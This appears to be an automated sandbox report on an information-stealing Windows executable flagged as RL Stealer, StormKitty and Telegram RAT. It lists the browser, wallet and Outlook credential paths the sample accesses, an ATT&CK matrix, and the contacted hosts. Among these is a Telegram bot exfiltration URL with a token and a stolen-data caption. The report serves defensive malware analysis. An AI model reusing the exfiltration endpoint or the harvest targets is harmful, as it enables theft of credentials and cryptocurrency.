Source: tmp2FE9.tmp.dat.0.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
Source: tmp2FE9.tmp.dat.0.dr	Binary or memory string: outlook.office365.comVMware20,11696497155t
Source: tmp2FE9.tmp.dat.0.dr	Binary or memory string: outlook.office.comVMware20,11696497155s
Source: tmp2FE9.tmp.dat.0.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
Source: tmp2FE9.tmp.dat.0.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
Source: tmp2FE9.tmp.dat.0.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x

Source: C:\Users\user\Desktop\vEtDFkAZjO.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\vEtDFkAZjO.exe

Code function: 0_2_01330DD0 rdtsc

0_2_01330DD0

Source: C:\Users\user\Desktop\vEtDFkAZjO.exe

Code function: 0_2_0101B2C0 LdrInitializeThunk,

0_2_0101B2C0

Source: C:\Users\user\Desktop\vEtDFkAZjO.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\vEtDFkAZjO.exe

Memory allocated: page read and write | page guard

Jump to behavior

Language, Device and Operating System Detection

Yara detected Telegram Recon

Source: Yara match

File source: vEtDFkAZjO.exe, type: SAMPLE

Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Queries volume information: C:\Users\user\Desktop\vEtDFkAZjO.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\vEtDFkAZjO.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: vEtDFkAZjO.exe, 00000000.00000002.1619782825.0000000006270000.00000004.00000020.00020000.00000000.sdmp, vEtDFkAZjO.exe, 00000000.00000002.1611814009.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp, vEtDFkAZjO.exe, 00000000.00000002.1611616512.0000000000E12000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Stealing of Sensitive Information

Yara detected RL STEALER

Source: Yara match	File source: vEtDFkAZjO.exe, type: SAMPLE
Source: Yara match	File source: 0.0.vEtDFkAZjO.exe.760000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1612337401.0000000003068000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1612337401.0000000003059000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1446417255.0000000000762000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1612337401.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vEtDFkAZjO.exe PID: 6624, type: MEMORYSTR

Yara detected StormKitty Stealer

Source: Yara match	File source: vEtDFkAZjO.exe, type: SAMPLE
Source: Yara match	File source: 0.0.vEtDFkAZjO.exe.760000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1446417255.0000000000762000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1612337401.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vEtDFkAZjO.exe PID: 6624, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: vEtDFkAZjO.exe, type: SAMPLE
Source: Yara match	File source: 0.0.vEtDFkAZjO.exe.760000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1446417255.0000000000762000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1612337401.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vEtDFkAZjO.exe PID: 6624, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: vEtDFkAZjO.exe, 00000000.00000000.1446417255.0000000000762000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: Electrum
Source: vEtDFkAZjO.exe, 00000000.00000000.1446417255.0000000000762000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: JaxxDir
Source: vEtDFkAZjO.exe, 00000000.00000000.1446417255.0000000000762000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: %\Wallets\DashCore\)\DashCore\wallet.dat#\Electrum\wallets%\Wallets\Electrum\%\Ethereum\keystore%\Wallets\Ethereum\-\Exodus\exodus.wallet\!\Wallets\Exodus\m\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: vEtDFkAZjO.exe, 00000000.00000000.1446417255.0000000000762000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: %\Wallets\DashCore\)\DashCore\wallet.dat#\Electrum\wallets%\Wallets\Electrum\%\Ethereum\keystore%\Wallets\Ethereum\-\Exodus\exodus.wallet\!\Wallets\Exodus\m\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: vEtDFkAZjO.exe, 00000000.00000000.1446417255.0000000000762000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: ExodusDir
Source: vEtDFkAZjO.exe, 00000000.00000000.1446417255.0000000000762000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: Ethereum
Source: vEtDFkAZjO.exe, 00000000.00000000.1446417255.0000000000762000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: %\Wallets\DashCore\)\DashCore\wallet.dat#\Electrum\wallets%\Wallets\Electrum\%\Ethereum\keystore%\Wallets\Ethereum\-\Exodus\exodus.wallet\!\Wallets\Exodus\m\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: vEtDFkAZjO.exe, 00000000.00000000.1446417255.0000000000762000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: %\Wallets\DashCore\)\DashCore\wallet.dat#\Electrum\wallets%\Wallets\Electrum\%\Ethereum\keystore%\Wallets\Ethereum\-\Exodus\exodus.wallet\!\Wallets\Exodus\m\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: vEtDFkAZjO.exe, type: SAMPLE
Source: Yara match	File source: 0.0.vEtDFkAZjO.exe.760000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1446417255.0000000000762000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1612337401.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vEtDFkAZjO.exe PID: 6624, type: MEMORYSTR

Remote Access Functionality

Yara detected RL STEALER

Source: Yara match	File source: vEtDFkAZjO.exe, type: SAMPLE
Source: Yara match	File source: 0.0.vEtDFkAZjO.exe.760000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1612337401.0000000003068000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1612337401.0000000003059000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1446417255.0000000000762000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1612337401.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vEtDFkAZjO.exe PID: 6624, type: MEMORYSTR

Yara detected StormKitty Stealer

Source: Yara match	File source: vEtDFkAZjO.exe, type: SAMPLE
Source: Yara match	File source: 0.0.vEtDFkAZjO.exe.760000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1446417255.0000000000762000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1612337401.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vEtDFkAZjO.exe PID: 6624, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: vEtDFkAZjO.exe, type: SAMPLE
Source: Yara match	File source: 0.0.vEtDFkAZjO.exe.760000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1446417255.0000000000762000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1612337401.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vEtDFkAZjO.exe PID: 6624, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Masquerading	1 OS Credential Dumping	21 Security Software Discovery	Remote Services	1 Screen Capture	1 Web Service	Exfiltration Over Other Network Medium	1 Data Encrypted for Impact
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	1 Email Collection	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Archive Collected Data	3 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	3 Data from Local System	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	5 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	14 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
vEtDFkAZjO.exe	69%	Virustotal		Browse
vEtDFkAZjO.exe	78%	ReversingLabs	ByteCode-MSIL.Infostealer.Echelon
vEtDFkAZjO.exe	100%	Avira	TR/Dropper.Gen
vEtDFkAZjO.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://ip-api.comd	0%	Avira URL Cloud	safe
http://api.telegram.orgd	0%	Avira URL Cloud	safe
https://forums.dropbox.com	0%	Avira URL Cloud	safe
https://api.vimeworld.ru/user/name/5https://freegeoip.app/xml/	0%	Avira URL Cloud	safe
https://api.ipif	0%	Avira URL Cloud	safe
https://api.vimeworld.ru/user/name/	0%	Avira URL Cloud	safe
http://api.ipify.orgd	0%	Avira URL Cloud	safe
https://api.telegram.orgd	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bg.microsoft.map.fastly.net	199.232.214.172	true	false	high
edge-block-www-env.dropbox-dns.com	162.125.66.15	true	false	high
ipbase.com	104.21.85.189	true	false	high
api.ipify.org	104.26.12.205	true	false	high
ip-api.com	208.95.112.1	true	false	high
freegeoip.app	188.114.97.3	true	false	high
api.telegram.org	149.154.167.220	true	false	high
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	high
241.42.69.40.in-addr.arpa	unknown	unknown	true	unknown
dl.dropboxusercontent.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://freegeoip.app/xml/	false	high
https://api.ipify.org/	false	high
http://ip-api.com/xml	false	high
https://dl.dropboxusercontent.com/s/n41axwfwvc7fb8d/image.png?dl=1	false	high
https://api.telegram.org/bot6888669690:AAFyR7HkvXimINeLgRWgwb_Nn3tW88-uq1Y/sendDocument?chat_id=%207424669291&caption=====%20RL%20STEALER%20====%20%0A%E2%8F%B0%20Date%20=%3E%2012/31/2024%209:02%0A%F0%9F%92%BBSystem%20=%3E%20Windows%2010%20Pro%20(64%20Bit)%0A%F0%9F%91%A4%20User%20=%3E%20user%0A%F0%9F%86%94%20PC%20=%3E%20138727%0A%F0%9F%8F%B4%20Country%20=%3E%20[United%20States]%0A%F0%9F%94%8D%20IP%20=%3E%208.46.123.189%0A%F0%9F%93%9D%20Language%20=%3E%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0A%F0%9F%94%93%20Antivirus%20=%3E%20Windows%20Defender.%0A%20====%7B%20User%20Data%20%7D====%0A%F0%9F%93%82%20FileGrabber%20=%3E%2061%0A%F0%9F%93%A6%20Telegram%20=%3E%20%E2%9D%8C%0A%F0%9F%92%B8%20Wallets%20=%3E%20%E2%9D%8C%0A%F0%9F%92%AC%20Discord%20=%3E%20%E2%9D%8C%0A%F0%9F%93%A1%20FileZilla:%20%E2%9D%8C%0A%20VimeWorld%20=%3E%20%E2%9D%8C%0A%20====%7B%20VPN%20%7D====%0A%20%E2%88%9F%20NordVPN%20=%3E%20%E2%9D%8C%0A%20%E2%88%9F%20OpenVPN%20=%3E%20%E2%9D%8C%0A%20%E2%88%9F%20ProtonVPN%20=%3E%20%E2%9D%8C%0A%20====%7B%20Browsers%20Data%20%7D====%0A%F0%9F%97%9D%20Passwords%20=%3E%200%0A%F0%9F%95%91%20History%20=%3E%201%0A%F0%9F%8D%AA%20Cookies%20=%3E%200%0A%F0%9F%93%9D%20AutoFills%20=%3E%200%0A%F0%9F%92%B3%20CC%20=%3E%200%0A%20====%7B%20Gaming%20%7D====%0A%20%F0%9F%8E%AE%20Steam%20=%3E%20%E2%9D%8C%0A%20==================%0A%20DOMAINS%20DETECTED:%0A%20-%20	false	high
https://ipbase.com/xml/	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	vEtDFkAZjO.exe, 00000000.00000002.1615790357.0000000003C1D000.00000004.00000800.00020000.00000000.sdmp, tmp921F.tmp.dat.0.dr, tmpEACC.tmp.dat.0.dr	false		high
https://api.telegram.org/bot6888669690:AAFyR7HkvXimINeLgRWgwb_Nn3tW88-uq1Y/sendDocument?chat_id=%207	vEtDFkAZjO.exe, 00000000.00000002.1612337401.000000000307A000.00000004.00000800.00020000.00000000.sdmp, vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000003076000.00000004.00000800.00020000.00000000.sdmp	false		high
http://api.ipify.orgd	vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000003059000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	vEtDFkAZjO.exe, 00000000.00000002.1615790357.0000000003C1D000.00000004.00000800.00020000.00000000.sdmp, tmp921F.tmp.dat.0.dr, tmpEACC.tmp.dat.0.dr	false		high
https://api.telegram.org	vEtDFkAZjO.exe, 00000000.00000002.1612337401.000000000307A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	vEtDFkAZjO.exe, 00000000.00000002.1615790357.0000000003C1D000.00000004.00000800.00020000.00000000.sdmp, tmp921F.tmp.dat.0.dr, tmpEACC.tmp.dat.0.dr	false		high
https://api.telegram.org/bot	vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002C01000.00000004.00000800.00020000.00000000.sdmp	false		high
https://steamcommunity.com/profiles/ASOFTWARE	vEtDFkAZjO.exe	false		high
https://api.telegram.org/bot6888669690:AAFyR7HkvXimINeLgRWgwb_Nn3tW88-uq1Y/sendDocument?chat_id=	vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000003068000.00000004.00000800.00020000.00000000.sdmp, vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000003059000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ip-api.comd	vEtDFkAZjO.exe, 00000000.00000002.1612337401.000000000303F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	vEtDFkAZjO.exe, 00000000.00000002.1615790357.0000000003C1D000.00000004.00000800.00020000.00000000.sdmp, tmp921F.tmp.dat.0.dr, tmpEACC.tmp.dat.0.dr	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	vEtDFkAZjO.exe, 00000000.00000002.1615790357.0000000003C1D000.00000004.00000800.00020000.00000000.sdmp, tmp921F.tmp.dat.0.dr, tmpEACC.tmp.dat.0.dr	false		high
https://api.telegram.org/bot6888669690:AAFyR7HkvXimINeLgRWgwb_Nn3tW88-uq1Y/sendDocument	vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000003068000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	vEtDFkAZjO.exe, 00000000.00000002.1615790357.0000000003C1D000.00000004.00000800.00020000.00000000.sdmp, tmp921F.tmp.dat.0.dr, tmpEACC.tmp.dat.0.dr	false		high
https://www.dropbox.com/login	vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002CB2000.00000004.00000800.00020000.00000000.sdmp, vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002C60000.00000004.00000800.00020000.00000000.sdmp, vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002CB6000.00000004.00000800.00020000.00000000.sdmp, vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp, vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002C64000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot-/sendDocument?chat_id==&caption=====	vEtDFkAZjO.exe	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	places.raw.0.dr	false		high
https://cfl.dropboxstatic.com/static/metaserver/static/css/error.css	vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002CB2000.00000004.00000800.00020000.00000000.sdmp, vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002C60000.00000004.00000800.00020000.00000000.sdmp	false		high
https://forums.dropbox.com	vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002CB2000.00000004.00000800.00020000.00000000.sdmp, vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002C60000.00000004.00000800.00020000.00000000.sdmp, vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002CB6000.00000004.00000800.00020000.00000000.sdmp, vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp, vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002C64000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://api.ipify.org	vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000003059000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.dropbox.com/help	vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002CB2000.00000004.00000800.00020000.00000000.sdmp, vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002C60000.00000004.00000800.00020000.00000000.sdmp, vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002CB6000.00000004.00000800.00020000.00000000.sdmp, vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp, vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002C64000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	vEtDFkAZjO.exe, 00000000.00000002.1615790357.0000000003C1D000.00000004.00000800.00020000.00000000.sdmp, tmp921F.tmp.dat.0.dr, tmpEACC.tmp.dat.0.dr	false		high
https://api.ipify.org	vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000003059000.00000004.00000800.00020000.00000000.sdmp, vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.ipify.org/d	vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000003059000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/LimerBoy/StormKitty	vEtDFkAZjO.exe	false		high
https://assets.dropbox.com/www/en-us/illustrations/spot/traffic-u-turn.svg	vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002CB2000.00000004.00000800.00020000.00000000.sdmp, vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002C60000.00000004.00000800.00020000.00000000.sdmp, vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002CB6000.00000004.00000800.00020000.00000000.sdmp, vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp, vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002C64000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	vEtDFkAZjO.exe, 00000000.00000002.1615790357.0000000003C1D000.00000004.00000800.00020000.00000000.sdmp, tmp921F.tmp.dat.0.dr, tmpEACC.tmp.dat.0.dr	false		high
http://ip-api.com	vEtDFkAZjO.exe, 00000000.00000002.1612337401.000000000303F000.00000004.00000800.00020000.00000000.sdmp, vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GNzbMA16ssY5	places.raw.0.dr	false		high
https://api.vimeworld.ru/user/name/	vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002C01000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.orgd	vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000003068000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.vimeworld.ru/user/name/5https://freegeoip.app/xml/	vEtDFkAZjO.exe	false	Avira URL Cloud: safe	unknown
http://api.telegram.orgd	vEtDFkAZjO.exe, 00000000.00000002.1612337401.000000000309B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ip-api.com/xmld	vEtDFkAZjO.exe, 00000000.00000002.1612337401.000000000303F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org	places.raw.0.dr	false		high
http://api.telegram.org	vEtDFkAZjO.exe, 00000000.00000002.1612337401.000000000309B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002C01000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	vEtDFkAZjO.exe, 00000000.00000002.1615790357.0000000003C1D000.00000004.00000800.00020000.00000000.sdmp, tmp921F.tmp.dat.0.dr, tmpEACC.tmp.dat.0.dr	false		high
https://api.ipif	vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000003047000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cfl.dropboxstatic.com/static/images/favicon.ico	vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002CB2000.00000004.00000800.00020000.00000000.sdmp, vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002C60000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.dropbox.com/home	vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002CB2000.00000004.00000800.00020000.00000000.sdmp, vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002C60000.00000004.00000800.00020000.00000000.sdmp, vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002CB6000.00000004.00000800.00020000.00000000.sdmp, vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp, vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002C64000.00000004.00000800.00020000.00000000.sdmp	false		high
https://dl.dropboxusercontent.com	vEtDFkAZjO.exe, 00000000.00000002.1612337401.0000000002C01000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
104.26.12.205	api.ipify.org	United States	13335	CLOUDFLARENETUS	false
188.114.97.3	freegeoip.app	European Union	13335	CLOUDFLARENETUS	false
104.21.85.189	ipbase.com	United States	13335	CLOUDFLARENETUS	false
162.125.66.15	edge-block-www-env.dropbox-dns.com	United States	19679	DROPBOXUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1582808
Start date and time:	2024-12-31 15:01:15 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 16s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	3
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	vEtDFkAZjO.exe renamed because original name is a hash value
Original Sample Name:	3d5021b656dcb39863d39430a4eddb5d6eb0e177.exe
Detection:	MAL
Classification:	mal100.rans.troj.spyw.winEXE@1/83@7/6
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 82 Number of non-executed functions: 27
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

